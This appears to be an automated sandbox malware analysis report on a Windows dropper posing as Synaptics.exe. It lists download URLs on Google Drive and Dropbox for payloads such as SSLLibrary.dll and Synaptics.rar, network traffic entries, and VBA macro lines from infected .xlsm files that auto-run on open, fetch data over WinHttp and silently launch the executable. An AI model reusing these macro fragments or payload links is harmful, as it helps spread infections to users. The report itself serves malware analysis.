                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadf3
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadfu
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadg
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgR
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgb
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgle.
                              Source: Synaptics.exe, 00000003.00000002.2038723103.000000001D584000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2011273120.000000000E7D9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgp
                              Source: Synaptics.exe, 00000003.00000002.1986453130.00000000069E8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadgs
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005CB000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadh
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhB
                              Source: Synaptics.exe, 00000003.00000002.2008395928.000000000E650000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhV
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadhf
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadi2
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadifL
                              Source: Synaptics.exe, 00000003.00000002.1984356830.00000000055B0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadion-
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloaditx
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadiyor.
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2010123381.000000000E73B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj7
                              Source: Synaptics.exe, 00000003.00000002.2039423119.000000001D5C8000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadj=
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjL
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjS
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadjv
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8B4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadk
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006B4C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkM
                              Source: Synaptics.exe, 00000003.00000002.2009145795.000000000E69C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkS
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadkTA
                              Source: Synaptics.exe, 00000003.00000002.2013234441.000000000E90A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~N
                              Source: Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~m
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download~ts
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloX
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloXO
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://docs.google.com/uc?id=0BxsMXGfPIZfSVzUyaHFYVkQxeFk&export=downloadN
                              Source: Synaptics.exe, 00000003.00000002.2014101336.000000000E9A7000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.use
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1986453130.0000000006AB4000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.000000000057A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download2
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download?
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadNt
                              Source: Synaptics.exe, 00000003.00000002.1980458813.00000000005AE000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.1980458813.00000000005DF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadZ0cs
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E87E000.00000004.00000020.00020000.00000000.sdmp, Synaptics.exe, 00000003.00000002.2012231153.000000000E8AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadc;
                              Source: Synaptics.exe, 00000003.00000002.2012231153.000000000E8AE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadch
                              Source: Synaptics.exe, 00000003.00000002.1983626889.00000000054ED000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=downloadq
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=1:
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/fzj752whr3ontsm/SSLLibrary.dll?dl=8
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/n1w4p8gc6jzo0sg/SUpdate.ini?dl=16
                              Source: Synaptics.exe, 00000003.00000003.1449952908.00000000005AF000.00000004.00000020.00020000.00000000.sdmp, file.exe, RCX3CE.tmp.0.dr, Synaptics.exe.0.dr, ~$cache1.3.drString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1
                              Source: Synaptics.exe, 00000003.00000002.1981358227.0000000002130000.00000004.00001000.00020000.00000000.sdmpString found in binary or memory: https://www.dropbox.com/s/zhp1b06imehwylq/Synaptics.rar?dl=1:
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50158 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50135 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49816
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49815
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49814
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49813
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49902 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49932
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49931
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49930
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50064 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50123 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50173 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50035 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49971 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50098 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49960 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50046 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49927
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49805
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49926
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50141 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49804
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49803
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49924
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49802
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50086 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50063 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50124 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50047 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50140 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49913
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49912
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49911
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49910
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49948 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49843 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50058 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50097 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50157 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49959 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49903
                              Source: unknownNetwork traffic detected: HTTP traffic on port 49903 -> 443
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49902
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49901
                              Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49900

                              System Summary

                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: FN = Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe"
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: Set myWS = CreateObject("WScript.Shell")
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: TMP = Environ("Temp") & "\~$cache1.exe"
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: If FSO.FileExists(Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe") Then
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: Shell Environ("ALLUSERSPROFILE") & "\Synaptics\Synaptics.exe", vbHide
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: ElseIf FSO.FileExists(Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe") Then
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: Shell Environ("WINDIR") & "\System32\Synaptics\Synaptics.exe", vbHide
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5.1")
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: Set WinHttpReq = CreateObject("WinHttp.WinHttpRequest.5")
                              Source: ofbduaaa.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: NHPKIZUUSG.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'ADODB.Stream' functions open, read, savetofile, write
                              Source: ofbduaaa.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: NHPKIZUUSG.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'XMLHttpRequest' functions response, responsebody, responsetext, status, open, send
                              Source: ofbduaaa.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: NHPKIZUUSG.xlsm.3.dr, Stream path 'VBA/ThisWorkbook' : found possibly 'WScript.Shell' functions regread, regwrite, environ
                              Source: C:\Users\user\Desktop\._cache_file.exe, Code function: 2_2_01003972 OpenEventA,WaitForSingleObject,CloseHandle,Sleep,LoadLibraryA,GetProcAddress,WaitForSingleObject,GetLastError,InitiateSystemShutdownA,GetLastError,WaitForSingleObject,GetLastError,GetVersionExA,GetVersionExA,GetVersionExA,GetSystemDirectoryA,strchr,CreateFileA,FlushFileBuffers,CloseHandle,NtShutdownSystem,FreeLibrary
                              Source: C:\Users\user\Desktop\._cache_file.exe, Code function: 2_2_0100358B NtOpenProcessToken,NtAdjustPrivilegesToken,NtClose,NtClose
                              Source: C:\Users\user\Desktop\._cache_file.exe, Code function: 2_2_010034F4 NtOpenProcessToken,NtAdjustPrivilegesToken,NtClose,NtClose
                              Source: C:\Users\user\Desktop\._cache_file.exe, Code function: 2_2_01002B13: GetDriveTypeA,CreateFileA,DeviceIoControl,CloseHandle
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Code function: 4_2_6C8F4E0D ExitWindowsEx
                              Source: C:\Program Files (x86)\Windows NT\Accessories\wordpad.exe, File created: C:\Windows\wordpad.INI
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: Private Sub Workbook_Open()
                              Source: ofbduaaa.xlsm.3.dr, OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: Private Sub Workbook_Open()
                              Source: NHPKIZUUSG.xlsm.3.dr, OLE, VBA macro line: Private Sub Workbook_BeforeClose(Cancel As Boolean)
                              Source: C:\ProgramData\Synaptics\Synaptics.exe, Process created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 7712 -s 3860
                              Source: file.exe, Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: file.exe, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (GUI) Intel 80386, for MS Windows
                              Source: Synaptics.exe.0.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: RCX3CE.tmp.0.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: SetupResources.dll4.2.dr, Static PE information: Resource name: RT_VERSION type: COM executable for DOS
                              Source: ~$cache1.3.dr, Static PE information: Resource name: RT_RCDATA type: PE32 executable (DLL) (GUI) Intel 80386, for MS Windows
                              Source: SetupResources.dll1.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll4.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll8.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll3.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll6.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll0.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll5.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll2.2.dr, Static PE information: No import functions for PE file found
                              Source: SetupResources.dll7.2.dr, Static PE information: No import functions for PE file found
                              Source: file.exe, 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Binary or memory string: OriginalFileName vs file.exe
                              Source: file.exe, 00000000.00000003.1388831651.0000000000CEE000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFileName2 vs file.exe
                              Source: file.exe, 00000000.00000003.1388831651.0000000000D25000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFileNameSb;( vs file.exe
                              Source: file.exe, 00000000.00000002.1389590131.0000000000D10000.00000004.00000020.00020000.00000000.sdmp, Binary or memory string: OriginalFileName2 vs file.exe
                              Source: file.exe, 00000000.00000003.1388744063.00000000026B0000.00000004.00001000.00020000.00000000.sdmp, Binary or memory string: OriginalFilenameb! vs file.exe
                              Source: ._cache_file.exe, 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp, Binary or memory string: OriginalFilenamevcredist_x64.exe~/ vs file.exe
                              Source: ._cache_file.exe, 00000002.00000002.2633033603.000000000101E000.00000002.00000001.01000000.00000005.sdmp, Binary or memory string: OriginalFilenameSFXCAB.EXEj% vs file.exe
                              Source: file.exe, Binary or memory string: OriginalFileName vs file.exe
                              Source: file.exe, Binary or memory string: OriginalFilenamevcredist_x64.exe~/ vs file.exe
                              Source: file.exe, Binary or memory string: OriginalFilenameSFXCAB.EXEj% vs file.exe
                              Source: file.exe, Binary or memory string: OriginalFilenameb! vs file.exe
                              Source: ._cache_file.exe.0.dr, Binary or memory string: OriginalFilenamevcredist_x64.exe~/ vs file.exe
                              Source: ._cache_file.exe.0.dr, Binary or memory string: OriginalFilenameSFXCAB.EXEj% vs file.exe
                              Source: file.exe, Static PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, BYTES_REVERSED_LO, 32BIT_MACHINE, BYTES_REVERSED_HI
                              Source: classification engine, Classification label: mal100.troj.expl.evad.winEXE@16/120@11/3
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Code function: 4_2_6396681A __EH_prolog3,GetLastError,GetLastError,SetLastError,SetLastError,FormatMessageW,GetLastError,SetLastError,LocalFree
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Code function: 4_2_6C8F4DC9 AdjustTokenPrivileges
                              Source: C:\Users\user\Desktop\._cache_file.exe, Code function: 2_2_01004F6B InitializeSecurityDescriptor,InitializeAcl,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,AddAccessAllowedAce,SetSecurityDescriptorDacl,GetCurrentDirectoryA,GetSystemDirectoryA,QueryDosDeviceA,_strlwr,strstr,strstr,strstr,GetDiskFreeSpaceA,CryptAcquireContextA,sprintf,CryptGenRandom,sprintf,sprintf,CryptReleaseContext,GetSystemTime,SystemTimeToFileTime,DialogBoxParamA,DosDateTimeToFileTime,LocalFileTimeToFileTime,SetFileTime,CloseHandle,SendDlgItemMessageA,MoveFileExA,strstr,_stricmp,SendDlgItemMessageA,GetLastError,CreateFileA,SetFilePointer,SetFilePointer,SetEndOfFile,SetFilePointer
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Code function: 4_2_6394EFE2 CreateToolhelp32Snapshot,_memset,Process32FirstW,Process32NextW,CloseHandle
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Code function: 4_2_6394DBFF __EH_prolog3,CoCreateInstance,SysFreeString,__CxxThrowException@8,SysFreeString
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Code function: 4_2_63967A10 LoadResource,LockResource,SizeofResource
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Code function: 4_2_6C8EE9B4 ChangeServiceConfigW
                              Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE, File created: C:\Program Files (x86)\Microsoft Office\root\vfs\Common AppData\Microsoft\Office\Heartbeat\HeartbeatCache.xml
                              Source: C:\Users\user\Desktop\file.exe, File created: C:\Users\user\Desktop\._cache_file.exe
                              Source: C:\ProgramData\Synaptics\Synaptics.exe, Mutant created: \Sessions\1\BaseNamedObjects\Synaptics2X
                              Source: C:\36a8a8e2fed651ec27d1eed188bb35\Setup.exe, Mutant created: \Sessions\1\BaseNamedObjects\Global\VC_Redist_SetupMutex
                              Source: C:\Windows\SysWOW64\WerFault.exe, Mutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess7712
                              Source: C:\ProgramData\Synaptics\Synaptics.exe, File created: C:\Users\user\AppData\Local\Temp\ofbduaaa.xlsm
                              Source: Yara match, File source: file.exe, type: SAMPLE
                              Source: Yara match, File source: 0.0.file.exe.400000.0.unpack, type: UNPACKEDPE
                              Source: Yara match, File source: 00000000.00000000.1361968808.0000000000401000.00000020.00000001.01000000.00000003.sdmp, type: MEMORY
                              Source: Yara match, File source: C:\ProgramData\Synaptics\RCX3CE.tmp, type: DROPPED
